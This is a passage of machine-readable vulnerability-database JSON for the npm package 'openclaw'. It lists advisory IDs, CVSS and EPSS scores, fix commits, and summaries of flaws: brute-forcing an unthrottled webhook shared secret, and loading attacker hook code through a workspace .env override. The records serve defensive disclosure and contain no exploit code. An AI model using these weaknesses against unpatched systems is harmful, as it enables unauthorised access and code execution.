v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerabilit
y":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerabilit
y":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerabilit
y":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41355","GHSA-42mx-vp8m-j7qh"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vqrj-z6tx-rff2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90962?format=json","vulnerability_id":"VCID-vtqt-bgz7-yub6","summary":"Duplicate Advisory: OpenClaw's Nextcloud Talk webhook missing rate limiting on shared secret authentication\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-9528-x887-j2fp. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 contains a missing rate limiting vulnerability in the Nextcloud Talk webhook authentication that allows attackers to brute-force weak shared secrets. 
Attackers who can reach the webhook endpoint can exploit this to forge inbound webhook events by repeatedly attempting authentication without throttling.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33580","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"
generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33580"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication"},{"reference_url":"https://github.com/advisories/GHSA-gm9m-x74r-8whg","reference_id":"GHSA-gm9m-x74r-8whg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gm9m-x74r-8whg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vuln
erability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vuln
erability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vuln
erability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-gm9m-x74r-8whg"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vtqt-bgz7-yub6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90013?format=json","vulnerability_id":"VCID-vx5d-3d98-7kf3","summary":"OpenClaw: Workspace `.env` can override the bundled hooks root and load attacker hook code\n## Summary\nWorkspace `.env` can override the bundled hooks root and load attacker hook code\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: 
v2026.3.28 still lets workspace .env override OPENCLAW_BUNDLED_HOOKS_DIR, which can replace trusted default-on bundled hooks from an untrusted workspace.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `330a9f98cb29c79b1c16a2117e03d6276a0d6289` — 2026-03-31T19:25:12+09:00\n\nOpenClaw thanks @nexrin for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41336","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03575","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03582","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03589","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41336"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"htt
ps://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3qpv-xf3v-mm45","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3qpv-xf3v-mm45"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41336","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41336"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-hook-code-execution-via-openclaw-bundled-hooks-dir-environment-variable-override","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:
H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-hook-code-execution-via-openclaw-bundled-hooks-dir-environment-variable-override"},{"reference_url":"https://github.com/advisories/GHSA-3qpv-xf3v-mm45","reference_id":"GHSA-3qpv-xf3v-mm45","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3qpv-xf3v-mm45"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{
"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnera